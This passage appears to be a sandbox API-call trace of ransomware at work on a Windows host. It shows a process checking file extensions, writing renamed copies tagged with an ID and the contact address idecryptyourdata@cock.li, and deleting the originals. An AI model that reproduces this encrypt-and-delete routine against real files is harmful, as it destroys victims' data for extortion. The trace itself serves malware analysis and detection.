[0047.113] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString=".1cd") returned 4 [0047.113] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString=".jpg") returned 4 [0047.113] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString=".doc") returned 4 [0047.113] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString=".docx") returned 5 [0047.114] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.114] lstrlenW (lpString=".pdf") returned 4 [0047.114] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString=".xls") returned 4 [0047.114] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString=".xlsx") returned 5 [0047.114] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.114] lstrlenW (lpString=".ppt") returned 4 [0047.114] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.114] lstrlenW (lpString=".zip") returned 4 [0047.114] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.114] lstrlenW (lpString=".rar") returned 4 [0047.114] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString=".bz2") returned 4 [0047.114] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString=".7z") returned 3 [0047.114] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.114] lstrlenW (lpString=".dbf") returned 4 [0047.114] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.114] lstrlenW (lpString=".1cd") returned 4 [0047.114] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.114] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.114] lstrlenW (lpString=".jpg") returned 4 [0047.114] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.115] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.115] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.115] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.115] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=86442) returned 1 [0047.115] CloseHandle (hObject=0x2c4) returned 1 [0047.115] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 0x80 [0047.115] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.115] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.115] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.115] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.116] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.116] GetLastError () returned 0x0 [0047.116] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x151aa, lpOverlapped=0x0) returned 1 [0047.127] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x151b0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x151b0, lpOverlapped=0x0) returned 1 [0047.129] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.129] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.129] SetEndOfFile (hFile=0x300) returned 1 [0047.129] CloseHandle (hObject=0x300) returned 1 [0047.132] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.132] SetEndOfFile (hFile=0x2c4) returned 1 [0047.133] CloseHandle (hObject=0x2c4) returned 1 [0047.133] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.133] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 1 [0047.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.134] lstrlenW (lpString=".doc") returned 4 [0047.134] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString=".docx") returned 5 [0047.134] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.134] lstrlenW (lpString=".pdf") returned 4 [0047.134] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString=".xls") returned 4 [0047.134] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString=".xlsx") returned 5 [0047.134] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.134] lstrlenW (lpString=".ppt") returned 4 [0047.134] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.134] lstrlenW (lpString=".zip") returned 4 [0047.134] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.134] lstrlenW (lpString=".rar") returned 4 [0047.134] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString=".bz2") returned 4 [0047.134] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.134] lstrlenW (lpString=".7z") returned 3 [0047.134] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.134] lstrlenW (lpString=".dbf") returned 4 [0047.135] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.135] lstrlenW (lpString=".1cd") returned 4 [0047.135] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.135] lstrlenW (lpString=".jpg") returned 4 [0047.135] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.135] lstrlenW (lpString=".doc") returned 4 [0047.135] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString=".docx") returned 5 [0047.135] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.135] lstrlenW (lpString=".pdf") returned 4 [0047.135] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString=".xls") returned 4 [0047.135] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString=".xlsx") returned 5 [0047.135] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.135] lstrlenW (lpString=".ppt") returned 4 [0047.135] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.135] lstrlenW (lpString=".zip") returned 4 [0047.135] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.135] lstrlenW (lpString=".rar") returned 4 [0047.135] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.135] lstrlenW (lpString=".bz2") returned 4 [0047.136] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.136] lstrlenW (lpString=".7z") returned 3 [0047.136] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.136] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.136] lstrlenW (lpString=".dbf") returned 4 [0047.136] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.136] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.136] lstrlenW (lpString=".1cd") returned 4 [0047.136] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.136] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 44 [0047.136] lstrlenW (lpString=".jpg") returned 4 [0047.136] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.136] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.136] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.136] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.137] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=80060) returned 1 [0047.137] CloseHandle (hObject=0x2c4) returned 1 [0047.137] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 0x80 [0047.137] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.138] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.138] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.138] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.138] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.141] GetLastError () returned 0x0 [0047.141] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x138bc, lpOverlapped=0x0) returned 1 [0047.144] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x138c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x138c0, lpOverlapped=0x0) returned 1 [0047.146] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.146] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.146] SetEndOfFile (hFile=0x2d0) returned 1 [0047.146] CloseHandle (hObject=0x2d0) returned 1 [0047.148] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.148] SetEndOfFile (hFile=0x300) returned 1 [0047.150] CloseHandle (hObject=0x300) returned 1 [0047.150] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.150] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 1 [0047.150] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.151] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.151] lstrlenW (lpString=".doc") returned 4 [0047.151] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.151] lstrlenW (lpString=".docx") returned 5 [0047.151] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.151] lstrlenW (lpString=".pdf") returned 4 [0047.151] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.151] lstrlenW (lpString=".xls") returned 4 [0047.151] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.151] lstrlenW (lpString=".xlsx") returned 5 [0047.151] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.151] lstrlenW (lpString=".ppt") returned 4 [0047.151] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.151] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.151] lstrlenW (lpString=".zip") returned 4 [0047.151] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.151] lstrlenW (lpString=".rar") returned 4 [0047.151] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.151] lstrlenW (lpString=".bz2") returned 4 [0047.152] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString=".7z") returned 3 [0047.152] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString=".dbf") returned 4 [0047.152] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString=".1cd") returned 4 [0047.152] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString=".jpg") returned 4 [0047.152] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString=".doc") returned 4 [0047.152] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString=".docx") returned 5 [0047.152] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.152] lstrlenW (lpString=".pdf") returned 4 [0047.152] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString=".xls") returned 4 [0047.152] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString=".xlsx") returned 5 [0047.152] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.152] lstrlenW (lpString=".ppt") returned 4 [0047.152] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.152] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.152] lstrlenW (lpString=".zip") returned 4 [0047.153] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.153] lstrlenW (lpString=".rar") returned 4 [0047.153] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.153] lstrlenW (lpString=".bz2") returned 4 [0047.153] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.153] lstrlenW (lpString=".7z") returned 3 [0047.153] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.153] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.153] lstrlenW (lpString=".dbf") returned 4 [0047.153] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.153] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.153] lstrlenW (lpString=".1cd") returned 4 [0047.153] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.153] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0047.153] lstrlenW (lpString=".jpg") returned 4 [0047.153] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.153] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.153] lstrlenW (lpString="eula.rtf") returned 8 [0047.153] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.154] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=10125) returned 1 [0047.154] CloseHandle (hObject=0x300) returned 1 [0047.154] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 0x80 [0047.154] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.154] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.154] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.154] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.154] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.154] GetLastError () returned 0x0 [0047.154] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x278d, lpOverlapped=0x0) returned 1 [0047.295] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2790, lpOverlapped=0x0) returned 1 [0047.296] ReadFile (in: hFile=0x300, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.296] WriteFile (in: hFile=0x2d0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.296] SetEndOfFile (hFile=0x2d0) returned 1 [0047.296] CloseHandle (hObject=0x2d0) returned 1 [0047.298] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.298] SetEndOfFile (hFile=0x300) returned 1 [0047.299] CloseHandle (hObject=0x300) returned 1 [0047.299] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.299] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 1 [0047.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.300] lstrlenW (lpString=".doc") returned 4 [0047.300] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.300] lstrlenW (lpString=".docx") returned 5 [0047.300] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.300] lstrlenW (lpString=".pdf") returned 4 [0047.300] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.300] lstrlenW (lpString=".xls") returned 4 [0047.300] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.300] lstrlenW (lpString=".xlsx") returned 5 [0047.300] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.300] lstrlenW (lpString=".ppt") returned 4 [0047.300] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.300] lstrlenW (lpString=".zip") returned 4 [0047.300] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.300] lstrlenW (lpString=".rar") returned 4 [0047.300] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.300] lstrlenW (lpString=".bz2") returned 4 [0047.300] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.300] lstrlenW (lpString=".7z") returned 3 [0047.300] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString=".dbf") returned 4 [0047.301] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString=".1cd") returned 4 [0047.301] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString=".jpg") returned 4 [0047.301] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString=".doc") returned 4 [0047.301] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString=".docx") returned 5 [0047.301] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.301] lstrlenW (lpString=".pdf") returned 4 [0047.301] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString=".xls") returned 4 [0047.301] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.301] lstrlenW (lpString=".xlsx") returned 5 [0047.301] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.301] lstrlenW (lpString=".ppt") returned 4 [0047.301] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.301] lstrlenW (lpString=".zip") returned 4 [0047.301] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.301] lstrlenW (lpString=".rar") returned 4 [0047.301] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.301] lstrlenW (lpString=".bz2") returned 4 [0047.302] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.302] lstrlenW (lpString=".7z") returned 3 [0047.302] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.302] lstrlenW (lpString=".dbf") returned 4 [0047.302] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.302] lstrlenW (lpString=".1cd") returned 4 [0047.302] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0047.302] lstrlenW (lpString=".jpg") returned 4 [0047.302] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.302] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.302] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.302] CreateFileW 